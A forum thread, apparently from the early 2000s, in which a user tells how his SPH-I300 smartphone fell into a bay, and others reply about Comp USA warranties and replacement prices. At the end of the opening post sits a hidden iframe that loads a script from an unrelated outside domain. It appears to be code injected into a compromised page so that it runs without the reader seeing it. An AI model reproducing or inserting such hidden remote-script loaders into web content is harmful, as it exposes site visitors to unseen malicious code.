+ Reply to Thread

Talking Listen To This One!

I took my wife out yesterday on our waverunner. As we were walking the dock to go to this tiki bar, she sends my SPH-I300 along with my leather case into the bay! I originally told her that I wanted an electric nose clipper for Fathers Day, Not anymore!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I-300 Novice

I-300 (Underwater Version)

Time to go to Comp USA and buy that warranty (assuming you recovered your I-300).

When I went to Comp USA to buy a warranty on an I-300 that I bought at Sprint, all they wanted was the serial number of the unit..they didn't even check to see if it was working...
    Ahmed V. Ismail
    A Smartphone Addict

Let me get this straight. Your wife threw your 300 into the bay on purpose?

I don't think she did it on purpose. she was just walking in stride and i guess with the salt water in her hands and the E&B leather case it just went flying. it missed land by just a few feet. i wish i knew about the comp usa warranty, but i left it there. i can let anyone who cares to fish it out know where it is +- 3ft.
    Anyone know where i can get the best deal these days on a new I300, or should i just hold off and wait for the new version if they are coming out with one soon.

BB had it for $350 last week. Coupled with the service plan you can't go wrong.